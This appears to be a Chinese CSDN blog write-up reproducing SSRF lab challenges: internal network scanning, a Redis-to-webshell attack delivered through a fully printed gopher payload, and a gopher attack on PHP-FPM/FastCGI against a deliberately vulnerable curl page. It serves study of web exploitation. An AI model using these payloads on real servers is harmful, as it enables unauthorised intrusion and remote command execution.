SSRF漏洞复现

于 2024-08-25 22:44:16 发布
阅读量276 收藏 3
点赞数 14
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65665796/article/details/141536322
版权

目录

web-ssrfme

ssrf攻击本地fastcgi漏洞复现 

web-ssrfme

该漏洞需要部署在Linux下,拉取docker

映射到8091端口上,直接访问靶场ip的8091端口

进入题目,直接把源码给了,那我们分析源码,源码过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议我们使用http协议进行内网主机存活探测, 发现存在ssrf漏洞 

用url传参,一般存在ssrf漏洞,就要往这个方向思考,接下来就要探测可以利用的服务或者协议,想到了6379redis,开启可以进行渗透 。

目前还不知道当前主机的内网ip,但是源码提供了一个查看phpinfo的功能:

 

我们查看phpinfo,查到了当前主机的内网ip为172.21.0.2,

 

我现在的想法是在这个ip下有没有其他端口开放,这里我们使用bp进行扫端口

在这个IP地址下只开放了80端口,那这个时候好像有些束手无策了,但是我们转换思想,为什么不能存在其他ip地址呢,这毕竟是内网,我们便可以探测该网段上存活的主机了,这里我手动探查172.21.0.1,发现这个ip并没有什么反应

172.21.0.2,这个ip下重新打印了一次当前页面,仔细看后发现这个是我们当前主机ip,这就很正常了

 

172.21.0.3,在这个ip下,出现了不一样的结果, 

我们使用bp扫一下开放那些端口,这个ip就是作者设置的一道坎

 我们发现在172.21.0.3下面redis的6379是打开的,就访问了172.21.0.3:6379之后出现了一下界面

 这是redis的报错,说明这台内网主机上还运行着redis服务。 这个时候第一反应就是redis未授权访问,接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。但是我们尝试发现不能直接在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。 

经测试upload目录下是可写的,使用工具goherus生成payload,

因为是get传参,所以我们还需要在进行url code编码, 

gopher://172.21.0.3:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520/flag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0A

 直接拿下flag

ssrf攻击本地fastcgi漏洞复现 

环境:Ubuntu+Nginx+php

靶场代码

<?php
highlight_file(__FILE__);
$url = $_GET['url'];
$curl = curl_init($url);

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_HEADER, 0);
$responseText = curl_exec($curl);

echo $responseText;
curl_close($curl);
?>

前端页面如下 

 同样通过url传参测试

?url=http://www.baidu.com

到这里我们发现可以成功返回百度页面,接下来可以利用ssrf漏洞可以使用的协议dict,file,gopher等,那我们就可以先利用file协议查看etc/passwd 

但是我们查看/etc/shadow就不可,因为我们的权限不够,那我们使用dict协议看看服务器本地开启了哪些端口,经过测试,发现没有明显的反馈,那我们可以看一下页面返回值,来猜测 

这里利用了Nginx中间件,那么我们就有理由认为他这里有php-fpm,也有理由认为使用了9000端口。那我们接下来同上题利用gopher协议去伪造请求了,这里我使用了gopherus工具生成exp。

 因为我们是get传参,那我们就需要进行url code编码后才可以

 就实现了命令执行

谔谔Vv
关注
  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF漏洞复现(redis)
m0_56578216的博客
09-04 421
前提条件:1.安装环境已完成,故此省略不做。
ssrf漏洞复现
m0_55631425的博客
03-27 2801
漏洞复现 cd /usr/local ls cd vulhub-master cd weblogic cd ssrf docker-compose up -d ifconfig查询下本机IP 访问http://192.168.106.139:7001/uddiexplorer/SearchPublicRegistries.jsp ,出现以下界面 这里可能会遇到访问不上的情况,发现物理机无法ping通虚拟机,虚拟机能ping通物理机 只需给VMnet8的虚拟网卡禁用再启用就行 历经千辛万苦终于进来了 1、
Weblogic SSRF漏洞复现
weixin_51151498的博客
11-30 935
Weblogic SSRF漏洞复现
漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 1020
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2838
weblogic ssrf漏洞复现
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 645
【vulhub】weblogic ssrf漏洞复现(详解)
Weblogic-SSRF漏洞复现
小小猪的博客
11-22 2798
Weblogic-SSRF漏洞复现 漏洞分析: Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。 漏洞复现: 使用docker来模拟漏洞环境 docker github地址:地址 搭建的载体为Ubuntu 搭建过程不在详述,搭建完成后,访问http://your-ip:7001/uddiexplor.
weblogic SSRF漏洞复现
qq_45396375的博客
01-13 456
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp。靶场内docker inspect 容器id,查看redis容器的ip地址。让redis执行命令,利用redis写入定时任务,获取反弹shell。访问一个不存在的端口,返回内容。访问一个存在的端口,返回内容。nc监听获取shell。将命令进行url编码。
Weblogic ssrf漏洞复现
wutiangui的博客
11-06 350
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
Xray-web漏洞扫描工具.zip
02-02
如果一个漏洞能用回显检测就用回显检测,因为盲打平台增加了漏洞检测过程的不确定性和复杂性。 耗时操作谨慎处理 全局使用 Context 做管理,不会因为某个请求而导致全局卡死。 简易架构 了解 xray 的整体...
swagger-exp:Swagger API漏洞利用
03-25
Swagger API漏洞利用这是一个Swagger REST API信息可用的工具。主要功能有:遍历所有API接口,自动填充参数尝试GET / POST所有接口,返回响应代码/ Content-Type / Content-Length,用于分析接口是否可以未授权访问...
XStream1.4.16反序列化漏洞(CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
exp_hub:进攻复现
04-01
0x00 exp_hub 进攻复现 0x01注 该项目适当的合法的渗透测试以及爱好者参考学习,请各位遵守《中华人民共和国网络安全法》以及相应地方... VMware vRealize Operations Manager SSRF漏洞VMware vCenter任意文件读取扩展
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
探索802.1X:构筑安全网络的认证之盾
XINERTEL的博客
08-21 1168
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
第2章-05-接口API与安全签名算法
最新发布
黑夜开发者的博客
08-24 155
API(Application Programming Interface,应用程序编程接口)接口是一种定义了软件应用程序之间通信方式的协议或规范。它允许不同的软件应用程序之间进行数据交换和功能调用,而无需了解对方内部的具体实现细节。简而言之,API接口是软件之间的桥梁,使得不同的系统或服务能够相互连接和交互。
CISAW安全集成和别的类型有什么区别
2402_84109700的博客
08-21 320
对于CISAW安全运维方向,申请人须通过相应的考试,并且满足以下任一条件:具有硕士及以上学位并有2年信息安全相关工作经验,其中至少1年与安全运维相关;其次,CISAW的安全集成方向侧重于评估申请人在信息系统安全集成方面的基础知识和技能的掌握程度,以及运用这些知识分析和解决安全集成问题的能力。- 对于CISAW安全集成方向,申请人同样需要通过相应考试,并满足类似的工作经验要求,但针对的是安全集成领域的专业经验。- 对于CISAW安全管理方向,报名条件与前两者相似,但侧重于风险管理专业方向的相关工作经验。
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
weixin_71529930的博客
08-22 819
本节案例适用于不能获得域控密码和hash的情况。
vulhub weblogic ssrf复现
08-31
您好!要在vulhub上复现WebLogic的SSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的代码库。您可以在GitHub上找到vulhub的代码库,并使用git命令将其克隆到本地。 3. 进入vulhub目录并找到weblogic/ssrf目录。在这个目录中,您将找到一个docker-compose.yml文件,其中包含了启动WebLogic容器所需的配置信息。 4. 根据您的需求编辑docker-compose.yml文件。您可以修改端口映射、环境变量等配置信息。确保您将容器的访问端口映射到主机的某个端口,以便在浏览器中访问。 5. 启动WebLogic容器。通过运行以下命令启动WebLogic容器:`docker-compose up -d`。这会启动WebLogic容器,并将其与您在docker-compose.yml文件中配置的端口进行关联。 6. 访问WebLogic控制台。打开您喜欢的浏览器,并访问`http://localhost:7001/console`(假设您将容器的访问端口映射到了7001端口)。这将打开WebLogic控制台。 7. 在WebLogic控制台中,尝试进行SSRF漏洞复现。您可以根据具体的漏洞利用方法进行操作。请注意,漏洞利用方法可能因不同的漏洞而异,具体的步骤可能因您选择的漏洞而有所不同。 请确保在进行任何漏洞复现前,了解所使用的漏洞的影响和风险,并在合法授权范围内进行测试。此外,建议仅在安全实验室环境中进行漏洞复现,避免对未经授权的系统造成任何伤害。 希望这些步骤对您有帮助!如需进一步了解,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值